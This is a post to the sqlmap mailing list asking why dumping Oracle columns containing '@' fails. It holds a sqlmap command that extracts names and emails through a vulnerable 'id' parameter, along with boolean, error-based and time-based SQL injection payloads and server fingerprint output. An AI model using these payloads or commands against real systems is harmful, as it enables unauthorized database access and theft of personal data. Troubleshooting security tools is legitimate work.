When using sqlmap/1.0-dev (r4277)
./sqlmap.py -v 4 -u
'http://www.example.com/comunity/artickles_details.php?id=190' -D BELCH -T
FELATORS -C FNAME,EMAIL --dump
banner: 'Oracle Database 11g Release 11.2.0.1.0 - 64bit Production'
Place: GETParameter: id Type: boolean-based blind Title: AND
boolean-based blind - WHERE or HAVING clause Payload: id=190 AND 9035=9035
Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause
(XMLType) Payload: id=190 AND 4286=(SELECT
UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(111)||CHR(114)||CHR(58)||(SELECT
(CASE WHEN (4286=4286) THEN 1 ELSE 0 END) FROM
DUAL)||CHR(58)||CHR(122)||CHR(113)||CHR(99)||CHR(58)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind Title: Oracle AND time-based blind
Payload: id=190 AND
6019=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(88)||CHR(82)||CHR(115),5)---
[21:18:48] [INFO] the back-end DBMS is Oracleweb server operating system: Linux
CentOS 5web application technology: Apache 2.2.3, PHP 5.3.5back-end DBMS: Oracle
If any columns selected contain an @, the dump fails with
[21:42:10] [WARNING] possible server trimmed output detected (due to its
length): part-of-field-before-at-sign" (not a Name)Error at line
1ORA-06512: at "SYS.XMLTYPE", line 310ORA-06512: at line 1 in
<b>/var/www/html/inc/details_inc.php
suggestions?
------------------------------------------------------------------------------
Storage Efficiency Calculator
This modeling tool is based on patent-pending intellectual property that
has been used successfully in hundreds of IBM storage optimization engage-
ments, worldwide. Store less, Store more with what you own, Move data to
the right place. Try It Now! http://www.accelacomm.com/jaw/sfnl/114/51427378/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
